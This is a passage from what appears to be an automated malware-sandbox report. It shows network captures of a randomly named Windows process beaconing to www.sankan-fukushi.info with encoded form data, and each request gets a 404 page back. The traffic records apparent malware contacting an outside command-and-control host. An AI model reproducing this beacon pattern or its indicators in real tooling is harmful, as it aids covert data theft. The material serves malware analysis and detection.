                                                            Dec 5, 2024 19:40:06.866046906 CET | 1236 | IN | Data Raw: 39 32 63 2d 2e 34 30 35 2d 2e 30 30 31 2d 2e 38 30 31 2e 31 32 34 2d 31 2e 31 33 33 2e 33 35 36 2d 2e 36 38 33 2e 34 38 32 2d 31 2e 30 30 31 20 31 2e 33 33 33 2d 2e 38 20 32 2e 31 34 35 2e 32 31 36 2e 38 39 32 20 31 2e 30 31 35 20 31 2e 35 32 20
                                                            Data Ascii: 92c-.405-.001-.801.124-1.133.356-.683.482-1.001 1.333-.8 2.145.216.892 1.015 1.52 1.933 1.52.918 0 1.717-.628 1.933-1.52.201-.812-.117-1.663-.8-2.145-.332-.231-.727-.354-1.132-.353l-.001-.003zm0-9.427c-.742.001-1.422.415-1.763 1.074-.433.825-.


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.7 | 49840 | 163.44.185.183 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:07.997749090 CET | 855 | OUT | POST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 237
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 6d 6f 35 63 4c 43 4c 37 45 64 2f 67 4e 6f 61 67 37 73 72 5a 36 51 4c 78 4a 70 43 36 52 63 46 36 4c 47 41 33 51 37 68 68 55 2f 58 65 76 34 41 67 34 6c 71 52 75 46 70 52 74 64 6a 75 4b 4b 57 75 71 52 53 79 63 6f 36 31 65 52 63 71 46 76 50 33 6a 59 63 6c 32 63 65 6f 6a 48 77 4d 55 39 56 32 44 50 4e 4f 62 63 38 61 34 65 39 59 6a 67 5a 39 4c 31 35 77 49 79 77 4f 35 57 44 4c 50 66 6e 32 7a 55 2f 76 45 7a 62 2f 50 59 5a 31 38 2b 56 4b 30 38 51 33 43 6c 6d 6c 46 31 6b 72 63 79 4c 6e 72 78 34 59 30 73 70 76 2f 53 67 68 70 73 6f 70 44 4e 33 48 77 73 4e 58 56 46 61 6c 41 3d
                                                            Data Ascii: wVb0=SUzGnuvHqjrd2fQpD9rZObhFsoMdveX8JlwZg4HRItmo5cLCL7Ed/gNoag7srZ6QLxJpC6RcF6LGA3Q7hhU/Xev4Ag4lqRuFpRtdjuKKWuqRSyco61eRcqFvP3jYcl2ceojHwMU9V2DPNObc8a4e9YjgZ9L15wIywO5WDLPfn2zU/vEzb/PYZ18+VK08Q3ClmlF1krcyLnrx4Y0spv/SghpsopDN3HwsNXVFalA=
                                                            Dec 5, 2024 19:40:09.421608925 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:09.421771049 CET | 1236 | IN | Data Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack:
                                                            Dec 5, 2024 19:40:09.421782017 CET | 1236 | IN | Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 2d 62 61 6c 6c 6f 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 6d 61
                                                            Data Ascii: } .lol-error-page__information-balloon { width: 100%; max-width: 620px; position: relative; display: inline-block; height: auto; padding: 20px; vertical-align: middle; b
                                                            Dec 5, 2024 19:40:09.421875954 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b
                                                            Data Ascii: line-height: 1.72; } .lol-error-page__ad { width: 100%; max-width: 620px; margin: 20px auto; } .lol-error-page__ad img { max-width: 468px; width: 100%; } .lol-e
                                                            Dec 5, 2024 19:40:09.421888113 CET | 896 | IN | Data Raw: 67 65 5f 5f 63 61 70 74 69 6f 6e 22 3e e3 81 8a e6 8e a2 e3 81 97 e3 81 ae e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f e3 80 82 3c 2f 70 3e 0a 20 20 20 20 20 20 20
                                                            Data Ascii: ge__caption"></p> <div class="lol-error-page__information"> <div class="lol-error-page__information-img"> <svg xmlns="http://www.w3.org/2000/svg" width=
                                                            Dec 5, 2024 19:40:09.421905041 CET | 1236 | IN | Data Raw: 39 33 33 20 33 2e 32 38 31 2d 32 35 2e 38 35 39 20 39 2e 39 2d 32 2e 37 32 37 20 33 2e 31 35 32 2d 34 2e 37 36 36 20 36 2e 38 33 39 2d 35 2e 39 38 36 20 31 30 2e 38 32 34 2e 33 30 38 2d 34 2e 38 35 38 20 31 2e 39 35 35 2d 39 2e 35 33 36 20 34 2e
                                                            Data Ascii: 933 3.281-25.859 9.9-2.727 3.152-4.766 6.839-5.986 10.824.308-4.858 1.955-9.536 4.759-13.515z"/><path fill="#fff" d="M23.693 42.593h-.4c-2.993.166-4.34 1.505-3.966 8.293-.007 2.101.415 4.181 1.238 6.114.696 1.315 2.18 2.009 3.635 1.7.646.041 1
                                                            Dec 5, 2024 19:40:09.421916008 CET | 1236 | IN | Data Raw: 2e 30 38 38 2d 31 2e 37 32 31 2d 31 2e 30 35 34 2d 31 34 2e 34 2e 36 39 32 2d 32 38 2e 32 35 33 2d 33 2e 35 36 37 2d 33 33 2e 37 31 35 2d 31 30 2e 33 32 35 2d 2e 35 37 2d 2e 37 30 38 2d 31 2e 35 38 2d 2e 38 37 36 2d 32 2e 33 34 39 2d 2e 33 39 31
                                                            Data Ascii: .088-1.721-1.054-14.4.692-28.253-3.567-33.715-10.325-.57-.708-1.58-.876-2.349-.391-6.87 4.196-11.795 10.946-13.693 18.769-.787-.194-1.6-.266-2.409-.211-8.006.467-7.482 8.624-7.333 12.04-.001 2.658.581 5.283 1.706 7.691 1.247 2.296 3.706 3.668
                                                            Dec 5, 2024 19:40:09.421926975 CET | 1236 | IN | Data Raw: 32 2d 31 2e 32 38 37 20 36 2e 30 39 35 2d 2e 37 31 38 20 31 2e 32 38 39 2d 32 2e 31 39 35 20 31 2e 39 35 36 2d 33 2e 36 33 36 20 31 2e 36 34 31 2d 2e 36 34 37 2e 30 33 37 2d 31 2e 32 38 36 2d 2e 31 36 31 2d 31 2e 38 2d 2e 35 35 37 76 2d 2e 30 37
                                                            Data Ascii: 2-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-4.425.355-.125.731-.181 1.107-.166h.449c1.474-.126 2.856.731 3.4 2.107.57 2.025.722 4.145.446 6.23
                                                            Dec 5, 2024 19:40:09.422504902 CET | 1236 | IN | Data Raw: 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 66 66 22 20 64 3d 22 4d 35 36 2e 33 39 20 36 34 2e 39 37 33 6c 2d 34 2e 31 31 35 20 31 2e 34 36 2d 34 2e 31 31 35 2d 31 2e 35 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d
                                                            Data Ascii: "/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.361-1.38-1.387-1.043-2.313.337-.926 1.351-1.416 2.285-1.103l3.5 1.279 3.517-1.279c.613-.251 1.314-
                                                            Dec 5, 2024 19:40:09.422517061 CET | 1236 | IN | Data Raw: 31 34 2d 2e 33 36 35 2d 2e 34 33 31 2d 2e 37 34 38 63 2d 31 2e 32 39 39 2d 32 2e 33 36 37 2d 32 2e 34 31 36 2d 34 2e 38 33 2d 33 2e 33 34 32 2d 37 2e 33 36 36 2d 31 2e 38 37 36 2d 35 2e 32 34 32 2d 33 2e 31 33 33 2d 31 30 2e 36 38 36 2d 33 2e 37
                                                            Data Ascii: 14-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.153 0 .302-.044.43-.128l10.472-6.891 3.85-2.511 3.917 2.608 10.428 6.984c.129.086.281.133.437.133l.2
                                                            Dec 5, 2024 19:40:09.542701006 CET | 1031 | IN | Data Raw: 39 31 2e 35 33 37 2e 36 35 33 20 31 2e 34 35 35 20 31 2e 34 2e 35 35 39 2e 35 34 37 20 37 2e 34 31 37 20 37 2e 31 38 37 2d 33 2e 32 38 39 20 32 2e 31 36 2d 39 2e 38 38 32 20 36 2e 34 35 38 2d 35 2e 31 32 35 2d 31 33 2e 33 30 38 7a 6d 32 34 2e 32
                                                            Data Ascii: 91.537.653 1.455 1.4.559.547 7.417 7.187-3.289 2.16-9.882 6.458-5.125-13.308zm24.211 6.956l-3.376-2.242 10.084-9.6.681.234.254.12 7.7 3.854-.443 1-5.185 13.111-9.715-6.477zm7.749 35.878c.152.157.235.367.232.585v8.083h18.019v-26.078c-.006-.325.


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.7 | 49846 | 163.44.185.183 | 80 | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:10.670095921 CET | 1868 | OUT | POST /21k5/ HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 1249
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.sankan-fukushi.info
                                                            Referer: http://www.sankan-fukushi.info/21k5/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Data Raw: 77 56 62 30 3d 53 55 7a 47 6e 75 76 48 71 6a 72 64 32 66 51 70 44 39 72 5a 4f 62 68 46 73 6f 4d 64 76 65 58 38 4a 6c 77 5a 67 34 48 52 49 74 2b 6f 34 75 44 43 4a 59 73 64 77 41 4e 6f 5a 67 37 74 72 5a 37 56 4c 77 68 6c 43 36 63 2b 46 2b 37 47 41 56 49 37 70 77 55 2f 64 65 76 34 43 67 34 34 6b 78 75 55 70 53 56 5a 6a 75 61 4b 57 75 71 52 53 77 45 6f 34 6b 65 52 61 71 46 73 66 48 6a 4d 59 6c 32 34 65 6f 4c 58 77 4d 51 44 56 46 4c 50 4e 71 2f 63 77 4a 41 65 30 59 6a 69 59 39 4b 6d 35 77 56 69 77 4f 6c 73 44 4b 4c 31 6e 31 54 55 2f 75 78 4e 42 37 37 48 47 32 6f 39 61 71 6f 68 52 55 43 71 6d 55 77 49 72 6f 6b 51 46 45 2f 56 77 71 49 2f 6e 61 4b 76 67 7a 52 46 74 61 48 46 34 43 4a 67 53 6c 78 38 4d 78 73 71 54 74 65 4a 41 6c 35 46 6d 65 78 54 67 41 55 66 78 36 4b 65 44 6e 5a 70 66 4f 6c 66 37 49 54 41 35 61 52 4d 55 33 50 39 75 31 50 38 79 68 43 2b 67 76 67 78 55 76 53 56 48 4a 39 31 30 42 7a 36 48 37 35 4f 46 76 52 57 46 59 37 6c 58 65 65 6e 62 70 59 64 63 57 48 5a 6f 42 62 44 48 37 6d 49 76 4c 39 73 65 [TRUNCATED]
                                                            Data Ascii: wVb0=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 [TRUNCATED]
                                                            Dec 5, 2024 19:40:12.253809929 CET | 1236              | IN        | HTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:12 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                            Dec 5, 2024 19:40:12.253829002 CET231INData Raw: 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f
                                                            Data Ascii: -weight: 600; line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -m
                                                            Dec 5, 2024 19:40:12.253845930 CET1236INData Raw: 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74
                                                            Data Ascii: s-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wr
                                                            Dec 5, 2024 19:40:12.253895998 CET224INData Raw: 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b
                                                            Data Ascii: e; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute;
                                                            Dec 5, 2024 19:40:12.253907919 CET1236INData Raw: 7a 2d 69 6e 64 65 78 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 38 70 78 3b 0a 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 63 61 6c 63 28 35 30 25 20 20 2d 20 31 30 70 78 29 3b 0a 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79
                                                            Data Ascii: z-index: 1; bottom: -8px; left: calc(50% - 10px); display: block; width: 0; content: ''; border-width: 10px 8px 0; border-style: solid; border-color: #fc3 transparent; }
                                                            Dec 5, 2024 19:40:12.253918886 CET224INData Raw: 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 2d 68 6f 6c 69
                                                            Data Ascii: @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal { display: inline; float: left; } } .lol-error-page__ad-banner-holizontal-right { margi
                                                            Dec 5, 2024 19:40:12.253940105 CET1236INData Raw: 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72
                                                            Data Ascii: n-left: 0; } @media screen and (min-width: 640px) { .lol-error-page__ad-banner-holizontal-right { margin-left: 20px; } } </style> <script type="text/javascript"> //
                                                            Dec 5, 2024 19:40:12.253958941 CET1236INData Raw: 35 36 2d 36 2e 30 39 35 20 33 2e 33 34 33 2d 31 34 2e 34 36 33 20 31 2e 37 31 36 2d 32 32 2e 34 35 35 7a 6d 2d 36 32 2e 32 37 31 2d 33 38 2e 33 33 34 63 35 2e 31 39 33 2d 36 2e 39 32 33 20 31 34 2e 33 38 31 2d 31 30 2e 34 33 20 32 37 2e 33 2d 31
                                                            Data Ascii: 56-6.095 3.343-14.463 1.716-22.455zm-62.271-38.334c5.193-6.923 14.381-10.43 27.3-10.43h.314c12.974 0 22.058 3.582 26.936 10.535 2.787 4.183 4.285 9.091 4.31 14.117-4.045-13.545-15.289-21.356-31.774-21.431-11.253 0-19.933 3.281-25.859 9.9-2.727
                                                            Dec 5, 2024 19:40:12.254209042 CET1236INData Raw: 66 66 66 22 20 64 3d 22 4d 34 32 2e 38 33 32 20 38 39 2e 36 32 36 6c 39 2e 31 37 33 20 38 2e 38 20 39 2e 34 38 38 2d 38 2e 37 32 36 2d 32 2e 36 33 34 2d 32 31 2e 34 37 36 68 2d 31 33 2e 33 39 33 7a 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23
                                                            Data Ascii: fff" d="M42.832 89.626l9.173 8.8 9.488-8.726-2.634-21.476h-13.393z"/><path fill="#f60" d="M88.16 43.646c-1.061-2.641-3.633-4.362-6.48-4.335-.793-.06-1.59.001-2.364.181-.533-2.534-1.341-5.002-2.409-7.36-.304-.67-.986-1.088-1.721-1.054-14.4.692-
                                                            Dec 5, 2024 19:40:12.254220009 CET1236INData Raw: 31 35 20 34 2e 38 32 38 20 31 2e 39 39 20 37 2e 33 34 35 2d 2e 36 31 20 31 2e 37 38 34 2d 2e 38 35 34 20 33 2e 36 37 33 2d 2e 37 31 38 20 35 2e 35 35 34 20 30 20 2e 39 33 33 20 30 20 31 2e 39 32 36 2d 2e 30 37 35 20 33 2e 30 31 2d 2e 30 37 35 20
                                                            Data Ascii: 15 4.828 1.99 7.345-.61 1.784-.854 3.673-.718 5.554 0 .933 0 1.926-.075 3.01-.075 1.084-.195 2.017-.3 2.935-.282 1.589-.348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2


                                                            Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                            8          | 192.168.2.7 | 49852       | 163.44.185.183 | 80               | 6992 | C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            Timestamp                          | Bytes transferred | Direction | Data
                                                            Dec 5, 2024 19:40:13.334870100 CET | 556               | OUT       | GET /21k5/?wVb0=fWbmkZjyrmfBp888CcG5P/tv6YAygrCJWn0G2JrBW+aKnevZKbpm6U1ITTXCtKXlDFd/bcpJLIqCcWUwrjM1A4LwPHwyvUagu3NR6s+1WMK3FQ8gyne1SqlHaV7MI3WrY5r02MQ5JkbW&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.sankan-fukushi.info
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:40:14.756237030 CET | 192               | IN        | HTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:40:14 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 19268
                                                            Connection: close
                                                            Server: Apache
                                                            Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                            Dec 5, 2024 19:40:14.756263971 CET1236INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d
                                                            Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0;
                                                            Dec 5, 2024 19:40:14.756285906 CET1236INData Raw: 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: ter; -ms-flex-pack: center; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap;
                                                            Dec 5, 2024 19:40:14.756300926 CET1236INData Raw: 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: ical-align: middle; border-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-
                                                            Dec 5, 2024 19:40:14.756536007 CET636INData Raw: 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20
                                                            Data Ascii: h: 100%; } .lol-error-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; }
                                                            Dec 5, 2024 19:40:14.756547928 CET1236INData Raw: 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 e3 82 b3 e3 83 94 e3 83 bc e3 83 a9 e3 82 a4 e3 83 88 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20
                                                            Data Ascii: style> <script type="text/javascript"> // function setCopyrights () { document.write('copyright(c)2001-' + ' <a href="https://pepabo.com/" target="_blank">GMO</a> all rights reserved'
